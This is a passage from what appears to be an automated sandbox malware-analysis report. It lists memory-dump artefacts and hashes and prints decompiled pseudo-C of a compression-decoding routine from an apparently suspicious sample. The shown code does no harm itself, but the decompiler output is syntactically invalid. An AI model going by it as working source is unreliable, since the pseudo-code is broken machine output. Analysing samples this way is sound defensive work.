                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                        • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                        • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                        • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E00407068() {
                                                                        				unsigned short _t531;
                                                                        				signed int _t532;
                                                                        				void _t533;
                                                                        				signed int _t534;
                                                                        				signed int _t535;
                                                                        				signed int _t565;
                                                                        				signed int _t568;
                                                                        				signed int _t589;
                                                                        				signed int* _t606;
                                                                        				void* _t613;
                                                                        
                                                                        				L0:
                                                                        				while(1) {
                                                                        					L0:
                                                                        					if( *(_t613 - 0x40) != 0) {
                                                                        						 *(_t613 - 0x84) = 0xa;
                                                                        						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                        					} else {
                                                                        						 *(__ebp - 0x84) = 9;
                                                                        						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                        					}
                                                                        					while(1) {
                                                                        						 *(_t613 - 0x54) = _t606;
                                                                        						while(1) {
                                                                        							L133:
                                                                        							_t531 =  *_t606;
                                                                        							_t589 = _t531 & 0x0000ffff;
                                                                        							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                        							if( *(_t613 - 0xc) >= _t565) {
                                                                        								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                        								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                        								 *(_t613 - 0x40) = 1;
                                                                        								_t532 = _t531 - (_t531 >> 5);
                                                                        								 *_t606 = _t532;
                                                                        							} else {
                                                                        								 *(_t613 - 0x10) = _t565;
                                                                        								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                        								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                        							}
                                                                        							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                        								goto L139;
                                                                        							}
                                                                        							L137:
                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                        								 *(_t613 - 0x88) = 5;
                                                                        								L170:
                                                                        								_t568 = 0x22;
                                                                        								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                        								_t535 = 0;
                                                                        								L172:
                                                                        								return _t535;
                                                                        							}
                                                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                        							L139:
                                                                        							_t533 =  *(_t613 - 0x84);
                                                                        							while(1) {
                                                                        								 *(_t613 - 0x88) = _t533;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t534 =  *(_t613 - 0x88);
                                                                        									if(_t534 > 0x1c) {
                                                                        										break;
                                                                        									}
                                                                        									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                        										case 0:
                                                                        											if( *(_t613 - 0x6c) == 0) {
                                                                        												goto L170;
                                                                        											}
                                                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        											_t534 =  *( *(_t613 - 0x70));
                                                                        											if(_t534 > 0xe1) {
                                                                        												goto L171;
                                                                        											}
                                                                        											_t538 = _t534 & 0x000000ff;
                                                                        											_push(0x2d);
                                                                        											asm("cdq");
                                                                        											_pop(_t570);
                                                                        											_push(9);
                                                                        											_pop(_t571);
                                                                        											_t609 = _t538 / _t570;
                                                                        											_t540 = _t538 % _t570 & 0x000000ff;
                                                                        											asm("cdq");
                                                                        											_t604 = _t540 % _t571 & 0x000000ff;
                                                                        											 *(_t613 - 0x3c) = _t604;
                                                                        											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                        											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                        											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                        											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                        												L10:
                                                                        												if(_t612 == 0) {
                                                                        													L12:
                                                                        													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                        													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                        													goto L15;
                                                                        												} else {
                                                                        													goto L11;
                                                                        												}
                                                                        												do {
                                                                        													L11:
                                                                        													_t612 = _t612 - 1;
                                                                        													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                        												} while (_t612 != 0);
                                                                        												goto L12;
                                                                        											}
                                                                        											if( *(_t613 - 4) != 0) {
                                                                        												GlobalFree( *(_t613 - 4));
                                                                        											}
                                                                        											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                        											 *(_t613 - 4) = _t534;
                                                                        											if(_t534 == 0) {
                                                                        												goto L171;
                                                                        											} else {
                                                                        												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                        												goto L10;
                                                                        											}
                                                                        										case 1:
                                                                        											L13:
                                                                        											__eflags =  *(_t613 - 0x6c);
                                                                        											if( *(_t613 - 0x6c) == 0) {
                                                                        												 *(_t613 - 0x88) = 1;
                                                                        												goto L170;
                                                                        											}
                                                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                        											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        											_t45 = _t613 - 0x48;
                                                                        											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                        											__eflags =  *_t45;
                                                                        											L15:
                                                                        											if( *(_t613 - 0x48) < 4) {
                                                                        												goto L13;
                                                                        											}
                                                                        											_t546 =  *(_t613 - 0x40);
                                                                        											if(_t546 ==  *(_t613 - 0x74)) {
                                                                        												L20:
                                                                        												 *(_t613 - 0x48) = 5;
                                                                        												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                        												goto L23;
                                                                        											}
                                                                        											 *(_t613 - 0x74) = _t546;
                                                                        											if( *(_t613 - 8) != 0) {
                                                                        												GlobalFree( *(_t613 - 8));
                                                                        											}
                                                                        											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                        											 *(_t613 - 8) = _t534;
                                                                        											if(_t534 == 0) {
                                                                        												goto L171;
                                                                        											} else {
                                                                        												goto L20;
                                                                        											}
                                                                        										case 2:
                                                                        											L24:
                                                                        											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                        											 *(_t613 - 0x84) = 6;
                                                                        											 *(_t613 - 0x4c) = _t553;
                                                                        											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                        											 *(_t613 - 0x54) = _t606;
                                                                        											goto L133;
                                                                        										case 3:
                                                                        											L21:
                                                                        											__eflags =  *(_t613 - 0x6c);
                                                                        											if( *(_t613 - 0x6c) == 0) {
                                                                        												 *(_t613 - 0x88) = 3;
                                                                        												goto L170;
                                                                        											}
                                                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        											_t67 = _t613 - 0x70;
                                                                        											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                        											__eflags =  *_t67;
                                                                        											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                        											L23:
                                                                        											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                        											if( *(_t613 - 0x48) != 0) {
                                                                        												goto L21;
                                                                        											}
                                                                        											goto L24;
                                                                        										case 4:
                                                                        											L133:
                                                                        											_t531 =  *_t606;
                                                                        											_t589 = _t531 & 0x0000ffff;
                                                                        											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                        											if( *(_t613 - 0xc) >= _t565) {
                                                                        												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                        												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                        												 *(_t613 - 0x40) = 1;
                                                                        												_t532 = _t531 - (_t531 >> 5);
                                                                        												 *_t606 = _t532;
                                                                        											} else {
                                                                        												 *(_t613 - 0x10) = _t565;
                                                                        												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                        												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                        											}
                                                                        											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                        												goto L139;
                                                                        											}
                                                                        										case 5:
                                                                        											goto L137;
                                                                        										case 6:
                                                                        											__edx = 0;
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x34) = 1;
                                                                        												 *(__ebp - 0x84) = 7;
                                                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                        												while(1) {
                                                                        													 *(_t613 - 0x54) = _t606;
                                                                        													goto L133;
                                                                        												}
                                                                        											}
                                                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                        											__esi =  *(__ebp - 0x60);
                                                                        											__cl = 8;
                                                                        											__cl = 8 -  *(__ebp - 0x3c);
                                                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                        											__ecx =  *(__ebp - 0x3c);
                                                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                        											__ecx =  *(__ebp - 4);
                                                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                        											__eflags =  *(__ebp - 0x38) - 4;
                                                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        											if( *(__ebp - 0x38) >= 4) {
                                                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                        												if( *(__ebp - 0x38) >= 0xa) {
                                                                        													_t98 = __ebp - 0x38;
                                                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                        													__eflags =  *_t98;
                                                                        												} else {
                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                        												}
                                                                        											} else {
                                                                        												 *(__ebp - 0x38) = 0;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                                                        											if( *(__ebp - 0x34) == __edx) {
                                                                        												__ebx = 0;
                                                                        												__ebx = 1;
                                                                        												goto L61;
                                                                        											} else {
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                        													__eflags = __eax;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 8);
                                                                        												__ebx = 0;
                                                                        												__ebx = 1;
                                                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                        												goto L41;
                                                                        											}
                                                                        										case 7:
                                                                        											__eflags =  *(__ebp - 0x40) - 1;
                                                                        											if( *(__ebp - 0x40) != 1) {
                                                                        												__eax =  *(__ebp - 0x24);
                                                                        												 *(__ebp - 0x80) = 0x16;
                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        												__eax =  *(__ebp - 0x28);
                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        												__eax =  *(__ebp - 0x2c);
                                                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        												__eax = 0;
                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        												__al = __al & 0x000000fd;
                                                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__eax =  *(__ebp - 4) + 0x664;
                                                                        												__eflags = __eax;
                                                                        												 *(__ebp - 0x58) = __eax;
                                                                        												goto L69;
                                                                        											}
                                                                        											__eax =  *(__ebp - 4);
                                                                        											__ecx =  *(__ebp - 0x38);
                                                                        											 *(__ebp - 0x84) = 8;
                                                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                        											while(1) {
                                                                        												 *(_t613 - 0x54) = _t606;
                                                                        												goto L133;
                                                                        											}
                                                                        										case 8:
                                                                        											goto L0;
                                                                        										case 9:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												goto L89;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x60);
                                                                        											if( *(__ebp - 0x60) == 0) {
                                                                        												goto L171;
                                                                        											}
                                                                        											__eax = 0;
                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                        											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                        											__eflags = _t258;
                                                                        											0 | _t258 = _t258 + _t258 + 9;
                                                                        											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                        											goto L75;
                                                                        										case 0xa:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x84) = 0xb;
                                                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                        												while(1) {
                                                                        													 *(_t613 - 0x54) = _t606;
                                                                        													goto L133;
                                                                        												}
                                                                        											}
                                                                        											__eax =  *(__ebp - 0x28);
                                                                        											goto L88;
                                                                        										case 0xb:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__ecx =  *(__ebp - 0x24);
                                                                        												__eax =  *(__ebp - 0x20);
                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        											} else {
                                                                        												__eax =  *(__ebp - 0x24);
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x28);
                                                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        											L88:
                                                                        											__ecx =  *(__ebp - 0x2c);
                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        											L89:
                                                                        											__eax =  *(__ebp - 4);
                                                                        											 *(__ebp - 0x80) = 0x15;
                                                                        											__eax =  *(__ebp - 4) + 0xa68;
                                                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                        											goto L69;
                                                                        										case 0xc:
                                                                        											L99:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xc;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t334 = __ebp - 0x70;
                                                                        											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t334;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											__eax =  *(__ebp - 0x2c);
                                                                        											goto L101;
                                                                        										case 0xd:
                                                                        											L37:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xd;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t122 = __ebp - 0x70;
                                                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t122;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											L39:
                                                                        											__eax =  *(__ebp - 0x40);
                                                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                        												goto L48;
                                                                        											}
                                                                        											__eflags = __ebx - 0x100;
                                                                        											if(__ebx >= 0x100) {
                                                                        												goto L54;
                                                                        											}
                                                                        											L41:
                                                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                        											__ecx =  *(__ebp - 0x58);
                                                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                        											 *(__ebp - 0x48) = __eax;
                                                                        											__eax = __eax + 1;
                                                                        											__eax = __eax << 8;
                                                                        											__eax = __eax + __ebx;
                                                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        											__ax =  *__esi;
                                                                        											 *(__ebp - 0x54) = __esi;
                                                                        											__edx = __ax & 0x0000ffff;
                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        												__cx = __ax;
                                                                        												 *(__ebp - 0x40) = 1;
                                                                        												__cx = __ax >> 5;
                                                                        												__eflags = __eax;
                                                                        												__ebx = __ebx + __ebx + 1;
                                                                        												 *__esi = __ax;
                                                                        											} else {
                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                        												0x800 = 0x800 - __edx;
                                                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                        												__ebx = __ebx + __ebx;
                                                                        												 *__esi = __cx;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        												goto L39;
                                                                        											} else {
                                                                        												goto L37;
                                                                        											}
                                                                        										case 0xe:
                                                                        											L46:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xe;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t156 = __ebp - 0x70;
                                                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t156;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											while(1) {
                                                                        												L48:
                                                                        												__eflags = __ebx - 0x100;
                                                                        												if(__ebx >= 0x100) {
                                                                        													break;
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												__edx = __ebx + __ebx;
                                                                        												__ecx =  *(__ebp - 0x10);
                                                                        												__esi = __edx + __eax;
                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        												__ax =  *__esi;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__edi = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													_t170 = __edx + 1; // 0x1
                                                                        													__ebx = _t170;
                                                                        													__cx = __ax >> 5;
                                                                        													__eflags = __eax;
                                                                        													 *__esi = __ax;
                                                                        												} else {
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edi;
                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													continue;
                                                                        												} else {
                                                                        													goto L46;
                                                                        												}
                                                                        											}
                                                                        											L54:
                                                                        											_t173 = __ebp - 0x34;
                                                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                        											__eflags =  *_t173;
                                                                        											goto L55;
                                                                        										case 0xf:
                                                                        											L58:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0xf;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t203 = __ebp - 0x70;
                                                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t203;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											L60:
                                                                        											__eflags = __ebx - 0x100;
                                                                        											if(__ebx >= 0x100) {
                                                                        												L55:
                                                                        												__al =  *(__ebp - 0x44);
                                                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                        												goto L56;
                                                                        											}
                                                                        											L61:
                                                                        											__eax =  *(__ebp - 0x58);
                                                                        											__edx = __ebx + __ebx;
                                                                        											__ecx =  *(__ebp - 0x10);
                                                                        											__esi = __edx + __eax;
                                                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        											__ax =  *__esi;
                                                                        											 *(__ebp - 0x54) = __esi;
                                                                        											__edi = __ax & 0x0000ffff;
                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        												__cx = __ax;
                                                                        												_t217 = __edx + 1; // 0x1
                                                                        												__ebx = _t217;
                                                                        												__cx = __ax >> 5;
                                                                        												__eflags = __eax;
                                                                        												 *__esi = __ax;
                                                                        											} else {
                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                        												0x800 = 0x800 - __edi;
                                                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        												__ebx = __ebx + __ebx;
                                                                        												 *__esi = __cx;
                                                                        											}
                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        												goto L60;
                                                                        											} else {
                                                                        												goto L58;
                                                                        											}
                                                                        										case 0x10:
                                                                        											L109:
                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                        												 *(__ebp - 0x88) = 0x10;
                                                                        												goto L170;
                                                                        											}
                                                                        											__ecx =  *(__ebp - 0x70);
                                                                        											__eax =  *(__ebp - 0xc);
                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											_t365 = __ebp - 0x70;
                                                                        											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                        											__eflags =  *_t365;
                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        											goto L111;
                                                                        										case 0x11:
                                                                        											L69:
                                                                        											__esi =  *(__ebp - 0x58);
                                                                        											 *(__ebp - 0x84) = 0x12;
                                                                        											while(1) {
                                                                        												 *(_t613 - 0x54) = _t606;
                                                                        												goto L133;
                                                                        											}
                                                                        										case 0x12:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												 *(__ebp - 0x84) = 0x13;
                                                                        												__esi =  *(__ebp - 0x58) + 2;
                                                                        												while(1) {
                                                                        													 *(_t613 - 0x54) = _t606;
                                                                        													goto L133;
                                                                        												}
                                                                        											}
                                                                        											__eax =  *(__ebp - 0x4c);
                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                        											__ecx =  *(__ebp - 0x58);
                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                        											__eflags = __eax;
                                                                        											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                        											goto L130;
                                                                        										case 0x13:
                                                                        											__eflags =  *(__ebp - 0x40);
                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                        												_t469 = __ebp - 0x58;
